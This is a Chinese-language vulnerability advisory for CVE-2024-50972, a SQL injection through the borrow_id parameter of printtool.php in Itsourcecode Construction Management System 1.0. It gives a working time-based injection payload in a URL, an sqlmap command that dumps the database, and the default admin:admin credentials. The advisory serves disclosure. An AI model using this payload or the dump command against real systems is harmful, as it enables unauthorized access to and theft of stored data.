CVE-2024-50972
描述
Itsourcecode Construction Management System 1.0 的 printtool.php 中存在 SQL 注入漏洞,允许远程攻击者通过 borrow_id 参数执行任意 SQL 命令。
漏洞类型
SQL 注入
产品厂商
Itsourcecode
受影响产品代码库:
https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0
受影响组件:
Itsourcecode Construction Management System v1.0 的 printtool.php 页面中的 borrow_id 参数存在 SQL 注入漏洞。
攻击向量:
- 在本地搭建应用,并使用管理员凭据 admin:admin 登录。
- 在浏览器中访问以下 URL:
http://localhost/monitoring_system/printtool.php?borrow_id=5
- 注入 SQL 负载:
修改 URL 中的 borrow_id 参数,包含基于时间的 SQL 注入负载。
http://localhost/monitoring_system/printtool.php?borrow_id=5'+AND+(SELECT+7254+FROM+(SELECT(SLEEP(20)))rcGT)--+xxQB
- 观察应用响应:
页面加载时间会明显延长(20 秒),如果注入成功,这确认了 borrow_id 参数存在 SQL 注入漏洞。
- 现在使用 SQLMap 工具进一步利用并转储数据库,使用以下命令:
sqlmap.py -u http://localhost/monitoring_system/printtool.php?borrow_id=5 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast
参考资料:
- https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
- https://owasp.org/www-community/attacks/SQL_Injection